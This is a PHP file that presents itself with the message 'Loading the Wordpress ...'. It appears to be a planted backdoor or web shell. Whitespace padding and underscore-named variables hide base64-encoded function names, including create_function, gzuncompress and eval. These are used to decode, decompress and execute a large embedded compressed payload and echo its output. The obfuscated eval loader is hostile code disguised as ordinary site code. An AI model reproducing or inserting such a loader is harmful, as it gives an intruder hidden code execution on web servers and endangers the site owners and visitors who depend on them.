<?php 
        $__='printf';$_='Loading the Wordpress ...';
        







































































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































                                                                                                                                                                                                                     $________;
